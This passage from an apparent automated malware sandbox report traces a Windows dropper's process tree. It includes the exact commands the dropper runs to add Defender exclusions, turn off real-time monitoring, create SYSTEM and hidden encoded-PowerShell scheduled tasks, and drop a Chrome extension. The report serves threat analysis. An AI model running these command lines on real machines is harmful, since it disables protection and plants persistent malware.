SeAssignPrimaryTokenPrivilege 1576 WMIC.exe Token: SeIncreaseQuotaPrivilege 1576 WMIC.exe Token: SeSecurityPrivilege 1576 WMIC.exe Token: SeTakeOwnershipPrivilege 1576 WMIC.exe Token: SeLoadDriverPrivilege 1576 WMIC.exe Token: SeSystemtimePrivilege 1576 WMIC.exe Token: SeBackupPrivilege 1576 WMIC.exe Token: SeRestorePrivilege 1576 WMIC.exe Token: SeShutdownPrivilege 1576 WMIC.exe Token: SeSystemEnvironmentPrivilege 1576 WMIC.exe Token: SeUndockPrivilege 1576 WMIC.exe Token: SeManageVolumePrivilege 1576 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2340 wrote to memory of 2728 2340 9810636e5c4e26fa19a3f1ce39f3844d044d499e18d9e672080c185d5cab7dde.exe 28 PID 2340 wrote to memory of 2728 2340 9810636e5c4e26fa19a3f1ce39f3844d044d499e18d9e672080c185d5cab7dde.exe 28 PID 2340 wrote to memory of 2728 2340 9810636e5c4e26fa19a3f1ce39f3844d044d499e18d9e672080c185d5cab7dde.exe 28 PID 2340 wrote to memory of 2728 2340 9810636e5c4e26fa19a3f1ce39f3844d044d499e18d9e672080c185d5cab7dde.exe 28 PID 2340 wrote to memory of 2728 2340 9810636e5c4e26fa19a3f1ce39f3844d044d499e18d9e672080c185d5cab7dde.exe 28 PID 2340 wrote to memory of 2728 2340 9810636e5c4e26fa19a3f1ce39f3844d044d499e18d9e672080c185d5cab7dde.exe 28 PID 2340 wrote to memory of 2728 2340 9810636e5c4e26fa19a3f1ce39f3844d044d499e18d9e672080c185d5cab7dde.exe 28 PID 2728 wrote to memory of 2532 2728 Install.exe 29 PID 2728 wrote to memory of 2532 2728 Install.exe 29 PID 2728 wrote to memory of 2532 2728 Install.exe 29 PID 2728 wrote to memory of 2532 2728 Install.exe 29 PID 2728 wrote to memory of 2532 2728 Install.exe 29 PID 2728 wrote to memory of 2532 2728 Install.exe 29 PID 2728 wrote to memory of 2532 2728 Install.exe 29 PID 2532 wrote to memory of 2616 2532 Install.exe 31 PID 2532 wrote to memory of 2616 2532 Install.exe 31 PID 2532 wrote to memory of 2616 2532 Install.exe 31 PID 2532 wrote to memory of 2616 2532 Install.exe 31 PID 2532 wrote to memory of 2616 2532 Install.exe 31 PID 2532 wrote to memory of 2616 2532 Install.exe 31 PID 2532 wrote to memory of 2616 2532 Install.exe 31 PID 2616 wrote to memory of 2172 2616 forfiles.exe 33 PID 2616 wrote to memory of 2172 2616 forfiles.exe 33 PID 2616 wrote to memory of 2172 2616 forfiles.exe 33 PID 2616 wrote to memory of 2172 2616 forfiles.exe 33 PID 2616 wrote to memory of 2172 2616 forfiles.exe 33 PID 2616 wrote to memory of 2172 2616 forfiles.exe 33 PID 2616 wrote to memory of 2172 2616 forfiles.exe 33 PID 2172 wrote to memory of 2564 2172 cmd.exe 34 PID 2172 wrote to memory of 2564 2172 cmd.exe 34 PID 2172 wrote to memory of 2564 2172 cmd.exe 34 PID 2172 wrote to memory of 2564 2172 cmd.exe 34 PID 2172 wrote to memory of 2564 2172 cmd.exe 34 PID 2172 wrote to memory of 2564 2172 cmd.exe 34 PID 2172 wrote to memory of 2564 2172 cmd.exe 34 PID 2564 wrote to memory of 2944 2564 powershell.exe 35 PID 2564 wrote to memory of 2944 2564 powershell.exe 35 PID 2564 wrote to memory of 2944 2564 powershell.exe 35 PID 2564 wrote to memory of 2944 2564 powershell.exe 35 PID 2564 wrote to memory of 2944 2564 powershell.exe 35 PID 2564 wrote to memory of 2944 2564 powershell.exe 35 PID 2564 wrote to memory of 2944 2564 powershell.exe 35 PID 2532 wrote to memory of 1580 2532 Install.exe 36 PID 2532 wrote to memory of 1580 2532 Install.exe 36 PID 2532 wrote to memory of 1580 2532 Install.exe 36 PID 2532 wrote to memory of 1580 2532 Install.exe 36 PID 2532 wrote to memory of 1580 2532 Install.exe 36 PID 2532 wrote to memory of 1580 2532 Install.exe 36 PID 2532 wrote to memory of 1580 2532 Install.exe 36 PID 1668 wrote to memory of 400 1668 taskeng.exe 39 PID 1668 wrote to memory of 400 1668 taskeng.exe 39 PID 1668 wrote to memory of 400 1668 taskeng.exe 39 PID 1668 wrote to memory of 400 1668 taskeng.exe 39 PID 400 wrote to memory of 240 400 UmWJAVg.exe 40 PID 400 wrote to memory of 240 400 UmWJAVg.exe 40 PID 400 wrote to memory of 240 400 UmWJAVg.exe 40 PID 400 wrote to memory of 240 400 UmWJAVg.exe 40 PID 400 wrote to memory of 1364 400 UmWJAVg.exe 42 PID 400 wrote to memory of 1364 400 UmWJAVg.exe 42 PID 400 wrote to memory of 1364 400 UmWJAVg.exe 42 PID 400 wrote to memory of 1364 400 UmWJAVg.exe 42 PID 2444 wrote to memory of 284 2444 taskeng.exe 45 PID 2444 wrote to memory of 284 2444 taskeng.exe 45 PID 2444 wrote to memory of 284 2444 taskeng.exe 45
Processes
-
C:\Users\Admin\AppData\Local\Temp\9810636e5c4e26fa19a3f1ce39f3844d044d499e18d9e672080c185d5cab7dde.exe"C:\Users\Admin\AppData\Local\Temp\9810636e5c4e26fa19a3f1ce39f3844d044d499e18d9e672080c185d5cab7dde.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Users\Admin\AppData\Local\Temp\7zS1AB2.tmp\Install.exe.\Install.exe /GORjbdidxLx "385137" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2944
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bsqNJSiTyoMLfdbIdy" /SC once /ST 22:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR\mrsGKhNotuBvBSu\UmWJAVg.exe\" 2Z /YiddidFRP 385137 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1580
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 5044⤵
- Loads dropped DLL
- Program crash
PID:2072
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {9714C25B-F86A-4733-8CC4-CFC9BE7FC07C} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR\mrsGKhNotuBvBSu\UmWJAVg.exeC:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR\mrsGKhNotuBvBSu\UmWJAVg.exe 2Z /YiddidFRP 385137 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gylkHISro" /SC once /ST 05:24:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:240
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gylkHISro"3⤵PID:1364
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gylkHISro"3⤵PID:2912
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1496
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:2036
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1244
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1108
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gmTakbmjf" /SC once /ST 18:57:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2984
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gmTakbmjf"3⤵PID:2108
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gmTakbmjf"3⤵PID:1808
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:3004
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:1440
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1544 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1532
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:323⤵PID:2724
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2044
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:643⤵PID:2660
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:323⤵PID:2592
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:324⤵PID:2584
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:643⤵PID:2596
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:644⤵PID:876
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\sFyaDrJXZzAeWCdu\FbeilEqA\zYVSCwPOlXCMtdcx.wsf"3⤵PID:2416
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\sFyaDrJXZzAeWCdu\FbeilEqA\zYVSCwPOlXCMtdcx.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1652 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bgwuTdWixDdNC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bgwuTdWixDdNC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kwkuzFKVqEUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kwkuzFKVqEUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\namDtuGKU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\namDtuGKU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wEnnazEvJNiU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wEnnazEvJNiU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BRUhuLZnBvQZvqVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BRUhuLZnBvQZvqVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:324⤵PID:696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:644⤵PID:2376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bgwuTdWixDdNC" /t REG_DWORD /d 0 /reg:324⤵PID:2792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bgwuTdWixDdNC" /t REG_DWORD /d 0 /reg:644⤵PID:2796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kwkuzFKVqEUn" /t REG_DWORD /d 0 /reg:324⤵PID:1836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kwkuzFKVqEUn" /t REG_DWORD /d 0 /reg:644⤵PID:1884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\namDtuGKU" /t REG_DWORD /d 0 /reg:324⤵PID:1496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\namDtuGKU" /t REG_DWORD /d 0 /reg:644⤵PID:448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wEnnazEvJNiU2" /t REG_DWORD /d 0 /reg:324⤵PID:2984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wEnnazEvJNiU2" /t REG_DWORD /d 0 /reg:644⤵PID:2108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BRUhuLZnBvQZvqVB" /t REG_DWORD /d 0 /reg:324⤵PID:1228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BRUhuLZnBvQZvqVB" /t REG_DWORD /d 0 /reg:644⤵PID:1256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:3020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:1316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR" /t REG_DWORD /d 0 /reg:324⤵PID:1484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR" /t REG_DWORD /d 0 /reg:644⤵PID:1388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:324⤵PID:2288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\sFyaDrJXZzAeWCdu" /t REG_DWORD /d 0 /reg:644⤵PID:2704
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gurDYCOGO" /SC once /ST 13:14:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:1756
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gurDYCOGO"3⤵PID:920
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gurDYCOGO"3⤵PID:876
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2456
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2120
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2392
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KdMGsZYUagVlNoZLt" /SC once /ST 11:53:52 /RU "SYSTEM" /TR "\"C:\Windows\Temp\sFyaDrJXZzAeWCdu\MLDoSxAKjhHzlFg\BlxWeZd.exe\" WB /csGgdidAW 385137 /S" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2560
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "KdMGsZYUagVlNoZLt"3⤵PID:2880
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 4843⤵
- Loads dropped DLL
- Program crash
PID:780
-
-
-
C:\Windows\Temp\sFyaDrJXZzAeWCdu\MLDoSxAKjhHzlFg\BlxWeZd.exeC:\Windows\Temp\sFyaDrJXZzAeWCdu\MLDoSxAKjhHzlFg\BlxWeZd.exe WB /csGgdidAW 385137 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2636 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bsqNJSiTyoMLfdbIdy"3⤵PID:2828
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:2916
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:2208
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:1824
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2136 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
-
-
-
-
